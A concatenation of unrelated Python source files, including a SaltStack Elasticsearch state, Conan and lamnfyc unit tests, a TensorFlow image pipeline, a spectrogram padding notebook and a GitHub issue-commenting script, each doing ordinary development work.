for k, v in six.iteritems(es_opts):
if not _compare_json(v, _describe[k]):
need_update = True
comm_args[k] = v
ret['changes'].setdefault('new', {})[k] = v
ret['changes'].setdefault('old', {})[k] = _describe[k]
if need_update:
if __opts__['test']:
msg = 'Domain {0} set to be modified.'.format(DomainName)
ret['comment'] = msg
ret['result'] = None
return ret
ret['comment'] = os.linesep.join([ret['comment'], 'Domain to be modified'])
r = __salt__['boto_elasticsearch_domain.update'](DomainName=DomainName,
region=region, key=key,
keyid=keyid, profile=profile,
**comm_args)
if not r.get('updated'):
ret['result'] = False
ret['comment'] = 'Failed to update domain: {0}.'.format(r['error'])
ret['changes'] = {}
return ret
return ret
def absent(name, DomainName,
region=None, key=None, keyid=None, profile=None):
'''
Ensure domain with passed properties is absent.
name
The name of the state definition.
DomainName
Name of the domain.
region
Region to connect to.
key
Secret key to be used.
keyid
Access key to be used.
profile
A dict with region, key and keyid, or a pillar key (string) that
contains a dict with region, key and keyid.
'''
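    # Illustrative SLS usage sketch only (not part of the original module); the
    # state id and names below are hypothetical:
    #
    #   Ensure Elasticsearch domain is absent:
    #     boto_elasticsearch_domain.absent:
    #       - DomainName: mydomain
    #       - profile: myprofile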
ret = {'name': DomainName,
'result': True,
'comment': '',
'changes': {}
}
r = __salt__['boto_elasticsearch_domain.exists'](DomainName,
region=region, key=key, keyid=keyid, profile=profile)
if 'error' in r:
ret['result'] = False
ret['comment'] = 'Failed to delete domain: {0}.'.format(r['error']['message'])
return ret
if r and not r['exists']:
ret['comment'] = 'Domain {0} does not exist.'.format(DomainName)
return ret
if __opts__['test']:
ret['comment'] = 'Domain {0} is set to be removed.'.format(DomainName)
ret['result'] = None
return ret
r = __salt__['boto_elasticsearch_domain.delete'](DomainName,
region=region, key=key,
keyid=keyid, profile=profile)
if not r['deleted']:
ret['result'] = False
ret['comment'] = 'Failed to delete domain: {0}.'.format(r['error']['message'])
return ret
ret['changes']['old'] = {'domain': DomainName}
ret['changes']['new'] = {'domain': None}
ret['comment'] = 'Domain {0} deleted.'.format(DomainName)
return ret
|
py | b41527aad62e59a8adf1626781a7a78572cb3c95 | import os
import shutil
import nose
import tempfile
import unittest
import mock
import lamnfyc.cli
import lamnfyc.utils
import lamnfyc.context_managers
from inspect import getargspec # noqa
import ipdb # noqa
from ipdb.__main__ import def_colors, def_exec_lines # noqa
from IPython import version_info as ipython_version # noqa
from IPython.terminal.interactiveshell import TerminalInteractiveShell # noqa
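# Compatibility shim for ipdb: IPython >= 5 exposes its debugger class via
# TerminalInteractiveShell().debugger_cls, older versions ship
# IPython.core.debugger.Pdb, and only some debugger classes accept a `context`
# keyword argument. The helpers below pick the right class/arguments and are
# monkey-patched into ipdb.__main__.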
def _get_debugger_cls():
if ipython_version < (5, 0, 0):
from IPython.core.debugger import Pdb
return Pdb
return TerminalInteractiveShell().debugger_cls
def _init_pdb(context=3):
debugger_cls = _get_debugger_cls()
if 'context' in getargspec(debugger_cls.__init__)[0]:
p = debugger_cls(def_colors, context=context)
else:
p = debugger_cls(def_colors)
p.rcLines += def_exec_lines
return p
ipdb.__main__._init_pdb = _init_pdb
from contextlib import contextmanager
import sys, os
@contextmanager
def redirect_stdout_stderr(stream):
old_stdout = sys.stdout
old_stderr = sys.stderr
sys.stdout = stream
sys.stderr = stream
try:
yield
finally:
sys.stdout = old_stdout
sys.stderr = old_stderr
class TestApp(unittest.TestCase):
@classmethod
def setUpClass(cls):
# Tests that the base yaml file works as intended
simple = """
packages:
- name: python
version: 2.7.6
environment:
required:
- SUPER_SECRET
defaults:
DEFAULT_ONE: "VALUE_ONE"
DEFAULT_TWO: "VALUE_TWO"
"""
cls.temp_folder = tempfile.mkdtemp()
        # Save everything inside a temporary folder so directory hierarchies can be tested
with lamnfyc.context_managers.chdir(cls.temp_folder):
with open('othername.yaml', 'w') as file_obj:
file_obj.write(simple)
@classmethod
def tearDownClass(cls):
shutil.rmtree(cls.temp_folder)
def test_install_options(self):
with lamnfyc.context_managers.chdir(self.temp_folder):
# Makes sure that the yaml config file gets created
nose.tools.assert_false(os.path.exists('lamnfyc.yaml'))
with self.assertRaises(SystemExit) as exc:
parsed = lamnfyc.cli.parser().parse_args(['--init'])
# Make sure that we quit "properly"
nose.tools.assert_equals(str(exc.exception), '0')
nose.tools.assert_true(os.path.exists('lamnfyc.yaml'))
# Init environment
parsed = lamnfyc.cli.parser().parse_args(['env'])
nose.tools.assert_equals(parsed.init, False)
nose.tools.assert_equals(parsed.environment, 'env')
nose.tools.assert_in('lamnfyc.yaml', parsed.config)
# Init custom environment config
parsed = lamnfyc.cli.parser().parse_args(['-c' 'othername.yaml', 'env'])
nose.tools.assert_equals(parsed.init, False)
nose.tools.assert_equals(parsed.config, 'othername.yaml')
nose.tools.assert_equals(parsed.environment, 'env')
# Invalid options
# Redirect all the output to /dev/null
with redirect_stdout_stderr(open(os.devnull, 'w')):
# Errors because the file already exists
with self.assertRaises(SystemExit) as exc:
lamnfyc.cli.parser().parse_args(['--init'])
nose.tools.assert_equals(str(exc.exception), '2')
                # Environment argument is required
with self.assertRaises(SystemExit) as exc:
lamnfyc.cli.parser().parse_args([''])
nose.tools.assert_equals(str(exc.exception), '2')
                # Verbosity value is not valid
with self.assertRaises(SystemExit) as exc:
lamnfyc.cli.parser().parse_args(['-v' 'NOT_VALID', 'env'])
nose.tools.assert_equals(str(exc.exception), '2')
# Config path is not valid
with self.assertRaises(SystemExit) as exc:
lamnfyc.cli.parser().parse_args(['-c' 'NOT_VALID', 'env'])
nose.tools.assert_equals(str(exc.exception), '2')
|
py | b415282c21509502cd98a1b781aa9677ecb2aa78 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='FooterTExt',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('footer_text', models.CharField(max_length=500)),
],
),
]
|
py | b4152992b261bac26428f3e24a197c1e9d31df3c | import unittest
from conans.client.loader import ConanFileTextLoader, ConanFileLoader
from conans.errors import ConanException
from conans.util.files import save
import os
from conans.model.requires import Requirements
from conans.model.options import OptionsValues
from mock import Mock
from conans.model.settings import Settings
from conans.test.utils.test_files import temp_folder
from conans.model.profile import Profile
from collections import OrderedDict
from mock.mock import call
from conans.client.loader_parse import load_conanfile_class
class ConanLoaderTest(unittest.TestCase):
def inherit_short_paths_test(self):
loader = ConanFileLoader(None, Settings(), Profile())
tmp_dir = temp_folder()
conanfile_path = os.path.join(tmp_dir, "conanfile.py")
conanfile = """from base_recipe import BasePackage
class Pkg(BasePackage):
pass
"""
base_recipe = """from conans import ConanFile
class BasePackage(ConanFile):
short_paths = True
"""
save(conanfile_path, conanfile)
save(os.path.join(tmp_dir, "base_recipe.py"), base_recipe)
conan_file = load_conanfile_class(conanfile_path)
self.assertEqual(conan_file.short_paths, True)
result = loader.load_conan(conanfile_path, output=None, consumer=True)
self.assertEqual(result.short_paths, True)
def requires_init_test(self):
loader = ConanFileLoader(None, Settings(), Profile())
tmp_dir = temp_folder()
conanfile_path = os.path.join(tmp_dir, "conanfile.py")
conanfile = """from conans import ConanFile
class MyTest(ConanFile):
requires = {}
def requirements(self):
self.requires("MyPkg/0.1@user/channel")
"""
for requires in ("''", "[]", "()", "None"):
save(conanfile_path, conanfile.format(requires))
result = loader.load_conan(conanfile_path, output=None, consumer=True)
result.requirements()
self.assertEqual("MyPkg/0.1@user/channel", str(result.requires))
def conanfile_txt_errors_test(self):
        # Invalid content: malformed section header
file_content = '''[requires}
OpenCV/2.4.10@phil/stable # My requirement for CV
'''
with self.assertRaisesRegexp(ConanException, "Bad syntax"):
ConanFileTextLoader(file_content)
file_content = '{hello}'
with self.assertRaisesRegexp(ConanException, "Unexpected line"):
ConanFileTextLoader(file_content)
file_content = '[imports]\nhello'
with self.assertRaisesRegexp(ConanException, "Invalid imports line: hello"):
ConanFileTextLoader(file_content).imports_method(None)
file_content = '[imports]\nbin, * -> bin @ kk=3 '
with self.assertRaisesRegexp(ConanException, "Unknown argument kk"):
ConanFileTextLoader(file_content).imports_method(None)
def plain_text_parser_test(self):
# Valid content
file_content = '''[requires]
OpenCV/2.4.10@phil/stable # My requirement for CV
OpenCV2/2.4.10@phil/stable #
OpenCV3/2.4.10@phil/stable
[generators]
one # My generator for this
two
[options]
OpenCV:use_python=True # Some option
OpenCV:other_option=False
OpenCV2:use_python2=1
OpenCV2:other_option=Cosa #
'''
parser = ConanFileTextLoader(file_content)
exp = ['OpenCV/2.4.10@phil/stable',
'OpenCV2/2.4.10@phil/stable',
'OpenCV3/2.4.10@phil/stable']
self.assertEquals(parser.requirements, exp)
def load_conan_txt_test(self):
file_content = '''[requires]
OpenCV/2.4.10@phil/stable
OpenCV2/2.4.10@phil/stable
[build_requires]
MyPkg/1.0.0@phil/stable
[generators]
one
two
[imports]
OpenCV/bin, * -> ./bin # I need this binaries
OpenCV/lib, * -> ./lib
[options]
OpenCV:use_python=True
OpenCV:other_option=False
OpenCV2:use_python2=1
OpenCV2:other_option=Cosa
'''
tmp_dir = temp_folder()
file_path = os.path.join(tmp_dir, "file.txt")
save(file_path, file_content)
loader = ConanFileLoader(None, Settings(), Profile())
ret = loader.load_conan_txt(file_path, None)
options1 = OptionsValues.loads("""OpenCV:use_python=True
OpenCV:other_option=False
OpenCV2:use_python2=1
OpenCV2:other_option=Cosa""")
requirements = Requirements()
requirements.add("OpenCV/2.4.10@phil/stable")
requirements.add("OpenCV2/2.4.10@phil/stable")
build_requirements = []
build_requirements.append("MyPkg/1.0.0@phil/stable")
self.assertEquals(ret.requires, requirements)
self.assertEquals(ret.build_requires, build_requirements)
self.assertEquals(ret.generators, ["one", "two"])
self.assertEquals(ret.options.values.dumps(), options1.dumps())
ret.copy = Mock()
ret.imports()
self.assertTrue(ret.copy.call_args_list, [('*', './bin', 'OpenCV/bin'),
('*', './lib', 'OpenCV/lib')])
# Now something that fails
file_content = '''[requires]
OpenCV/2.4.104phil/stable
'''
tmp_dir = temp_folder()
file_path = os.path.join(tmp_dir, "file.txt")
save(file_path, file_content)
loader = ConanFileLoader(None, Settings(), Profile())
with self.assertRaisesRegexp(ConanException, "Wrong package recipe reference(.*)"):
loader.load_conan_txt(file_path, None)
file_content = '''[requires]
OpenCV/2.4.10@phil/stable111111111111111111111111111111111111111111111111111111111111111
[imports]
OpenCV/bin/* - ./bin
'''
tmp_dir = temp_folder()
file_path = os.path.join(tmp_dir, "file.txt")
save(file_path, file_content)
loader = ConanFileLoader(None, Settings(), Profile())
with self.assertRaisesRegexp(ConanException, "is too long. Valid names must contain"):
loader.load_conan_txt(file_path, None)
def load_imports_arguments_test(self):
file_content = '''
[imports]
OpenCV/bin, * -> ./bin # I need this binaries
OpenCV/lib, * -> ./lib @ root_package=Pkg
OpenCV/data, * -> ./data @ root_package=Pkg, folder=True # Irrelevant
docs, * -> ./docs @ root_package=Pkg, folder=True, ignore_case=True, excludes="a b c" # Other
licenses, * -> ./licenses @ root_package=Pkg, folder=True, ignore_case=True, excludes="a b c", keep_path=False # Other
'''
tmp_dir = temp_folder()
file_path = os.path.join(tmp_dir, "file.txt")
save(file_path, file_content)
loader = ConanFileLoader(None, Settings(), Profile())
ret = loader.load_conan_txt(file_path, None)
ret.copy = Mock()
ret.imports()
expected = [call(u'*', u'./bin', u'OpenCV/bin', None, False, False, None, True),
call(u'*', u'./lib', u'OpenCV/lib', u'Pkg', False, False, None, True),
call(u'*', u'./data', u'OpenCV/data', u'Pkg', True, False, None, True),
call(u'*', u'./docs', u'docs', u'Pkg', True, True, [u'"a', u'b', u'c"'], True),
call(u'*', u'./licenses', u'licenses', u'Pkg', True, True, [u'"a', u'b', u'c"'],
False)]
self.assertEqual(ret.copy.call_args_list, expected)
def test_package_settings(self):
# CREATE A CONANFILE TO LOAD
tmp_dir = temp_folder()
conanfile_path = os.path.join(tmp_dir, "conanfile.py")
conanfile = """from conans import ConanFile
class MyTest(ConanFile):
requires = {}
name = "MyPackage"
version = "1.0"
settings = "os"
"""
save(conanfile_path, conanfile)
# Apply windows for MyPackage
profile = Profile()
profile.package_settings = {"MyPackage": OrderedDict([("os", "Windows")])}
loader = ConanFileLoader(None, Settings({"os": ["Windows", "Linux"]}), profile)
recipe = loader.load_conan(conanfile_path, None)
self.assertEquals(recipe.settings.os, "Windows")
# Apply Linux for MyPackage
profile.package_settings = {"MyPackage": OrderedDict([("os", "Linux")])}
loader = ConanFileLoader(None, Settings({"os": ["Windows", "Linux"]}), profile)
recipe = loader.load_conan(conanfile_path, None)
self.assertEquals(recipe.settings.os, "Linux")
# If the package name is different from the conanfile one, it wont apply
profile.package_settings = {"OtherPACKAGE": OrderedDict([("os", "Linux")])}
loader = ConanFileLoader(None, Settings({"os": ["Windows", "Linux"]}), profile)
recipe = loader.load_conan(conanfile_path, None)
self.assertIsNone(recipe.settings.os.value)
|
py | b415299fe1ef1a9ef1dc5bb19e0fe728a1213df8 | n = int(input())
elements = set()
for _ in range(n):
data = input()
if " " in data:
data = data.split(" ")
for el in data:
elements.add(el)
else:
elements.add(data)
for el in elements:
print(el) |
py | b41529ac15f2d6a0f99f65fba405ca617c6cf5bb | """
SHERPA is a Python library for hyperparameter tuning of machine learning models.
Copyright (C) 2018 Lars Hertel, Peter Sadowski, and Julian Collado.
This file is part of SHERPA.
SHERPA is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
SHERPA is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with SHERPA. If not, see <http://www.gnu.org/licenses/>.
"""
from __future__ import absolute_import
from .core import *
from . import database
from .database import Client
from . import algorithms
import logging
__version__ = '1.0.6'
logging.basicConfig(level=logging.INFO)
|
py | b4152aa03df30a9c136148e0a0fcc28b3ba890f8 | import argparse
import requests
import pendulum
from github import Github
# 14 for test 12 real get up
GET_UP_ISSUE_NUMBER = 1
GET_UP_MESSAGE_TEMPLATE = (
"这次工作时间是--{get_up_time}.\r\n\r\n www \r\n\r\n 今天的总时长:\r\n {number_toady} "
)
#SENTENCE_API = "https://v1.jinrishici.com/all"
#DEFAULT_SENTENCE = "赏花归去马如飞\r\n去马如飞酒力微\r\n酒力微醒时已暮\r\n醒时已暮赏花归\r\n"
TIMEZONE = "Asia/Shanghai"
def login(token):
return Github(token)
#def get_one_sentence():
# try:
# r = requests.get(SENTENCE_API)
# if r.ok:
# return r.json().get("content", DEFAULT_SENTENCE)
# return DEFAULT_SENTENCE
#except:
# print("get SENTENCE_API wrong")
# return DEFAULT_SENTENCE
def get_today_get_up_status(issue):
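    # Walk the issue comments from newest to oldest and count how many of the
    # most recent ones were posted today (Asia/Shanghai time); returns False
    # when the issue has no comments at all.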
comments = list(issue.get_comments())
if not comments:
return False
latest_comment = comments[-1]
number_today = 0
now = pendulum.now(TIMEZONE)
latest_day = pendulum.instance(latest_comment.created_at).in_timezone(
"Asia/Shanghai"
)
while((latest_day.day == now.day) and (latest_day.month == now.month)):
if number_today >= len(comments)-2:
break
number_today = number_today +1
latest_comment = comments[-number_today]
latest_day = pendulum.instance(latest_comment.created_at).in_timezone(
"Asia/Shanghai"
)
return number_today
def make_get_up_message(number_toady):
#sentence = get_one_sentence()
now = pendulum.now(TIMEZONE)
# 3 - 7 means early for me
# is_get_up_early = 6 <= now.hour <= 18
get_up_time = now.to_datetime_string()
number_toady_str = str((number_toady+1) * 25) + 'min'
body = GET_UP_MESSAGE_TEMPLATE.format(get_up_time=get_up_time, number_toady=number_toady_str) #, sentence=sentence)
return body #, is_get_up_early
def main(github_token, repo_name):
u = login(github_token)
repo = u.get_repo(repo_name)
issue = repo.get_issue(GET_UP_ISSUE_NUMBER)
number_toady = get_today_get_up_status(issue)
# if is_toady:
# print("Today I have recorded the wake up time")
# return
early_message = make_get_up_message(number_toady)
body = early_message
#if weather_message:
# weather_message = f"现在的天气是{weather_message}\n"
# body = weather_message + early_message
#if is_get_up_early:
issue.create_comment(body)
# send to telegram
# if tele_token and tele_chat_id:
# requests.post(
# url="https://api.telegram.org/bot{0}/{1}".format(
# tele_token, "sendMessage"
# ),
# data={
# "chat_id": tele_chat_id,
# "text": body,
# },
# )
#else:
# print("You wake up late")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("github_token", help="github_token")
parser.add_argument("repo_name", help="repo_name")
# parser.add_argument(
# "--weather_message", help="weather_message", nargs="?", default="", const=""
# )
# parser.add_argument("--tele_token", help="tele_token", nargs="?", default="", const="")
#parser.add_argument("--tele_chat_id", help="tele_chat_id", nargs="?", default="", const="")
options = parser.parse_args()
main(
options.github_token,
options.repo_name,
# options.weather_message,
# options.tele_token,
# options.tele_chat_id,
)
|
py | b4152bbcc10e5ae286bd12431bd1d4218f763f11 | import pytest
from .models import User
@pytest.mark.django_db
def test_user_create():
User.objects.create_user('john', '[email protected]', 'johnpassword')
assert User.objects.count() == 1
|
py | b4152bde3b88f895c4aa910f602af278de09246f | import tensorflow as tf
import os
import numpy as np
import augmentations
import histogram
import data_processing
AUTOTUNE = tf.data.experimental.AUTOTUNE
IMG_HEIGHT = 320
IMG_WIDTH = 640
TRAIN = 'train'
TEST = 'test'
VALID = 'valid'
fax = os.name != 'nt'
# STEPS_PER_EPOCH = np.ceil(image_count/BATCH_SIZE)
def regression_dataset(data_dir, type=TRAIN, bs=2, cache=True, gt_from_txt=False, uv=True):
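    # Build a tf.data pipeline: list the files under <data_dir>/images, map each
    # one to an (input image, ground-truth illuminant/mask, visualisation image)
    # tuple, then batch/cache it via data_processing.prepare_for_training.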
pth = '/images/*'
list_ds = tf.data.Dataset.list_files(str(data_dir + pth))
labeled_ds = list_ds.map(lambda x: process_path_regression(x, gt_from_txt, type, uv), num_parallel_calls=AUTOTUNE)
train_ds = data_processing.prepare_for_training(labeled_ds, bs=bs, type=type, cache=cache)
return train_ds
def dataset(data_dir, type=TRAIN, bs=2, corrected=True, cache=True):
pth = '/img_corrected_1/*' if corrected else '/images/*'
list_ds = tf.data.Dataset.list_files(str(data_dir + pth))
labeled_ds = list_ds.map(lambda x: process_path(x, type), num_parallel_calls=AUTOTUNE)
    train_ds = data_processing.prepare_for_training(labeled_ds, bs=bs, type=type, cache=cache)
return train_ds
def normalize(*images):
if len(images) == 1:
return histogram.to_uv(images[0])
images = list(map(histogram.to_uv, images))
return images
def get_mask(file_path, gt_from_txt=False, segmentation=True):
parts = tf.strings.split(file_path, os.path.sep)
# The second to last is the class-directory
pth = 'gt_mask' if segmentation else 'gt'
pth = pth if not gt_from_txt else 'ill'
ext = tf.convert_to_tensor(['txt' if gt_from_txt else 'png'])
name = tf.strings.split(parts[-1], '.')[0]
name = tf.strings.reduce_join([tf.convert_to_tensor([name]), ext], separator='.')
path = tf.concat([parts[:-2], tf.convert_to_tensor([pth, name])], axis=0)
path = tf.strings.reduce_join(path, separator="/")
if gt_from_txt:
file = tf.io.read_file(path)
mask = tf.io.decode_csv(file, [1., 1., 1., 1., 1., 1.], field_delim=' ')
return tf.convert_to_tensor(mask)
mask = tf.io.read_file(path)
mask = decode_img(mask)
if fax:
mask = 1 - mask
# if segmentation:
# mask = tf.reduce_max(mask, axis=2, keepdims=True)
return mask
def decode_img(img):
# convert the compressed string to a 3D uint8 tensor
img = tf.image.decode_png(img, channels=3)
# Use `convert_image_dtype` to convert to floats in the [0,1] range.
img = tf.image.convert_image_dtype(img, tf.float32)
# resize the image to the desired size.
return img
def process_path_regression(file_path, gt_from_txt, type, uv):
mask = get_mask(file_path, segmentation=False)
# load the raw data from the file as a string
img = tf.io.read_file(file_path)
img = decode_img(img)
if type == TRAIN:
img, mask = load_image_train({'image': img, 'segmentation_mask': mask})
if not gt_from_txt:
img, mask = augmentations.color(img, mask)
else:
img, mask = load_image_test({'image': img, 'segmentation_mask': mask})
img_vis = img
if uv:
img, Iy = histogram.to_uv(img)
img = tf.stack([Iy, img[...,0], img[...,1]], axis=-1)
if gt_from_txt:
mask = get_mask(file_path, gt_from_txt, segmentation=False)
if uv:
mask = tf.reshape(mask, (-1, 3))
mask, masky = histogram.to_uv(mask)
mask = tf.reshape(mask, (-1,))
else:
mask = tf.reduce_mean(mask, axis=(0, 1))
if uv:
mask, masky = histogram.to_uv(mask)
return img, mask, img_vis
def process_path(file_path, type=TRAIN):
mask = get_mask(file_path)
# load the raw data from the file as a string
img = tf.io.read_file(file_path)
img = decode_img(img)
if type == TRAIN:
img, mask = load_image_train({'image': img, 'segmentation_mask': mask})
img, mask = augmentations.augment(img, mask)
else:
img, mask = load_image_test({'image': img, 'segmentation_mask': mask})
img = tf.image.resize(img, [IMG_HEIGHT, IMG_WIDTH])
mask = tf.image.resize(mask, [IMG_HEIGHT, IMG_WIDTH])
img_uv, Iy = histogram.to_uv(img)
mask = tf.round(mask)
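    # Encode the rounded RGB ground-truth mask as a 3-way one-hot label:
    # pure white pixels -> class 0, everything else -> class 2, and very dark
    # pixels (luminance Iy < 0.09) are overridden to class 1 ("black") below.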
mask = tf.where(mask == tf.convert_to_tensor([1., 1., 1.]), tf.convert_to_tensor([1., 0., 0.]),
tf.convert_to_tensor([0., 0., 1.]))
mask = tf.where(tf.expand_dims(Iy, axis=2) < 0.09, tf.convert_to_tensor([0., 1., 0.]), mask)# BLACK CLASS
return img_uv, mask, img
@tf.function
def load_image_train(datapoint):
input_image = tf.image.resize(datapoint['image'], (IMG_HEIGHT, IMG_WIDTH))
input_mask = tf.image.resize(datapoint['segmentation_mask'], (IMG_HEIGHT, IMG_WIDTH))
if tf.random.uniform(()) > 0.5:
input_image = tf.image.flip_left_right(input_image)
input_mask = tf.image.flip_left_right(input_mask)
if tf.random.uniform(()) > 0.5:
input_image = tf.image.flip_up_down(input_image)
input_mask = tf.image.flip_up_down(input_mask)
return input_image, input_mask
def load_image_test(datapoint):
input_image = tf.image.resize(datapoint['image'], (IMG_HEIGHT, IMG_WIDTH))
input_mask = tf.image.resize(datapoint['segmentation_mask'], (IMG_HEIGHT, IMG_WIDTH))
# input_image, input_mask = normalize(input_image, input_mask)
return input_image, input_mask
|
py | b4152c47362aecb093346ae0456d3132cfd881e6 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 9 16:40:48 2019
@author: TH
"""
# =============================================================================
# Padding and resizing
# =============================================================================
import numpy as np
import pandas as pd
import os
import matplotlib.pyplot as plt
import PIL.Image as pimg
from pathlib import Path
import torch
print (os.listdir("../input"))
#%%
! tar xf ../input/spectrograms.tar.bz2 # Extract the spectrogram archive
#%%
data_dir = Path('../input')
label_dir = data_dir/'NIPS4B_BIRD_CHALLENGE_TRAIN_LABELS'
spect_dir = Path('./spectrograms')
resized_dir = Path('./spectrograms_resized')
resized_dir.mkdir(parents = True, exist_ok = True)
#%%
for ds in ('train', 'test'): # plot the histogram of spectrogram widths
sizes = torch.Tensor([pimg.open(p).size for p in (spect_dir/ds).glob('*.png')])
print(ds, "[max_width, min_width, height]:")
print(list(map(lambda t:t.item(), (torch.max(sizes[:, 0]),
torch.min(sizes[:, 0]),
sizes[0, 1]))))
plt.hist(sizes[:, 0])
plt.title(f'Widths in {ds} dataset')
plt.show()
#%%
def pad_repeat(image:pimg.Image, width:int): # Pad the spectrogram to the target width by repeating (tiling) it
    if (image.width >= width): # already wide enough; return the image unchanged
return image
new_im = pimg.new('RGB', (width, image.height))
# offset = (width - image.width) // 2 % image.width
offset = 0
# first part of the spectrum
box = (image.width, 0, image.width, image.height)
new_im.paste(image.crop(box))
    while offset < width: # tile the image horizontally until the target width is filled
new_im.paste(image, (offset, 0))
offset += image.width
return new_im
#%%
#offset = (676 - 136) // 2 % 136
#
#offset = 0
#print ("start_p",offset)
#box_ = (0, 0, 136, 193)
#new_im_ = pimg.new('RGB', (676, 193))
#new_im_.paste(to_pad.crop(box_))
#display(new_im_)
#while offset < 676:
# new_im_.paste(to_pad, (offset, 0))
# display(new_im_)
# offset += 136
# print (offset)
# print (new_im_.size)
#display(new_im_)
#%%
to_pad = pimg.open(str(spect_dir/'train'/'nips4b_birds_trainfile115.png'))
print(to_pad.size)
display(to_pad)
padded = pad_repeat(to_pad, 676)
display(padded)
print(padded.size)
#%%
def pad_resize_folder(from_path, to_path, folder=""): # Pad each spectrogram to the folder's max width, then resize to a square
(to_path/folder).mkdir(parents=True, exist_ok=True)
fns = list((from_path/folder).glob('*.png'))
mw = max(map(lambda p: pimg.open(p).width, fns))
for src in fns:
dest = to_path/folder/src.name
pad_repeat(pimg.open(src), mw).resize((mw, mw)).save(dest)
for ds in ('train', 'test'):
pad_resize_folder(spect_dir, resized_dir, ds)
#%%
import random
for ds in ('train', 'test'):
fig, axs = plt.subplots(3,3,figsize=(12,12))
fig.suptitle(ds)
fns = list((resized_dir/ds).glob('*.png'))
for fn, ax in zip(random.choices(fns, k=9),
axs.flatten()):
ax.imshow(plt.imread(str(fn)))
ax.set_title(fn.stem)
ax.axis('off')
#%%
for ds in ('train', 'test'): # plot the histogram of resized spectrogram widths
sizes = torch.Tensor([pimg.open(p).size for p in (resized_dir/ds).glob('*.png')])
print(ds, "[max_width, min_width, height]:")
print(list(map(lambda t:t.item(), (torch.max(sizes[:, 0]),
torch.min(sizes[:, 0]),
sizes[0, 1]))))
plt.hist(sizes[:, 0])
plt.title(f'Widths in {ds} dataset')
plt.show()
#%%
! tar cjf spectrograms_resized.tar.bz2 $resized_dir # Create a bzip2-compressed tar archive of the resized spectrograms
! rm -r $spect_dir $resized_dir |
py | b4152ce79e685abe7c171a22d78a21332fcd6f47 | # -*- encoding: utf-8 -*-
"""
License: MIT
Copyright (c) 2019 - present AppSeed.us
"""
from django.urls import path, re_path
from app import views
from django.conf.urls import url
urlpatterns = [
# Matches any html file
re_path(r'^.*\.html', views.pages, name='pages'),
# The home page
path('', views.index, name='home'),
path('api', views.api, name='api'),
path('complain.html', views.forms, name='forms'),
re_path(r'^delete/', views.delete, name='delete'),
]
|
py | b4152d6a9be3367987b4b8eb0a780ccabef56c31 | n = int(input())
s = input()
prev_x = ''
prev_y = ''
k = 1
for c in s:
if c in ['R', 'L']:
if c == 'R' and prev_x == 'L' or c == 'L' and prev_x == 'R':
k += 1
prev_x = c
prev_y = ''
else:
prev_x = c
if c in ['U', 'D']:
if c == 'U' and prev_y == 'D' or c == 'D' and prev_y == 'U':
k += 1
prev_x = ''
prev_y = c
else:
prev_y = c
print(k)
|
py | b4152deb0cd001843c7fe4677a7cfececc1ccdf7 | """
A dataset handles and abstracts low-level access to the data. The dataset
takes data stored locally, in the format in which it was downloaded, and
converts it into an MNE Raw object. There are options to pool all the
different recording sessions per subject or to evaluate them separately.
"""
from .alex_mi import AlexMI
from .bbci_eeg_fnirs import Shin2017A, Shin2017B
from .bnci import (
BNCI2014001,
BNCI2014002,
BNCI2014004,
BNCI2014008,
BNCI2014009,
BNCI2015001,
BNCI2015003,
BNCI2015004,
)
from .braininvaders import bi2013a
from .epfl import EPFLP300
# flake8: noqa
from .gigadb import Cho2017
from .mpi_mi import MunichMI
from .physionet_mi import PhysionetMI
from .schirrmeister2017 import Schirrmeister2017
from .ssvep_exo import SSVEPExo
from .ssvep_mamem import MAMEM1, MAMEM2, MAMEM3
from .ssvep_nakanishi import Nakanishi2015
from .ssvep_wang import Wang2016
from .upper_limb import Ofner2017
from .Weibo2014 import Weibo2014
from .Zhou2016 import Zhou2016
|
py | b4152e3261e8870ec139215bb890a2e50418da47 | """Model to represent DeviantArt Eclipse Deviation Awarded Badges."""
from daeclipse.models.model import Model
class DeviationAwardedBadge(Model):
"""Model to represent DeviantArt Eclipse Deviation Awarded Badges."""
def __init__(self, attrs=None):
"""Initialize DeviationAwardedBadge.
Args:
attrs (dict, optional): Dict of model attributes.
"""
self.id = None
self.type_id = None
self.name = None
self.title = None
self.base_title = None
self.description = None
self.stack_count = None
self.images = None
super().__init__(attrs)
def from_dict(self, attrs):
"""Convert attrs values to class attributes.
Args:
attrs (dict): Dict containing DeviationAwardedBadge fields.
"""
super().from_dict(attrs)
self.id = attrs.get('id')
self.type_id = attrs.get('typeId')
self.name = attrs.get('name')
self.title = attrs.get('title')
self.base_title = attrs.get('baseTitle')
self.description = attrs.get('description')
self.stack_count = attrs.get('stackCount')
self.images = attrs.get('images')
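    # Illustrative usage sketch only (not part of the original class); the field
    # values are hypothetical and it is assumed that the base Model forwards
    # `attrs` to from_dict(), as the attrs docstring suggests:
    #
    #   badge = DeviationAwardedBadge({'id': 1, 'typeId': 2, 'title': 'Example'})
    #   badge.title  # -> 'Example'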
|
py | b4152f189286fb26e6c78959c808768c5bb32be6 |
# Dicts to interpret result of play
cPLAY_RESULT_INVLD = {0: 'Strike/Foul'}
cPLAY_RESULT_OUT = {
1: 'Strikeout',
4: 'Out',
5: 'Caught',
6: 'Caught',
0xE: 'SacFly'
}
cPLAY_RESULT_SAFE = {
2: 'BB',
3: 'HBP',
7: 'Single',
8: 'Double',
9: 'Triple',
0xA: 'Homerun',
0x10: 'ClearedBases'
}
cPLAY_RESULT_BUNT = {0xD: 'Bunt'}
# Consts used to create profile query
cCharacters = 1
cCaptains = 2
cTYPE_OF_SWING = {
0: "None",
1: "Slap",
2: "Charge",
3: "Star",
4: "Bunt"
} |
py | b4152fafa4a95c5f05e2149e51744e3aa99e4c14 | from __future__ import division, absolute_import, print_function
from numpy.testing import *
import numpy as np
from numpy import (array, ones, r_, mgrid, unravel_index, zeros, where,
ndenumerate, fill_diagonal, diag_indices,
diag_indices_from, s_, index_exp, ndindex)
class TestRavelUnravelIndex(TestCase):
def test_basic(self):
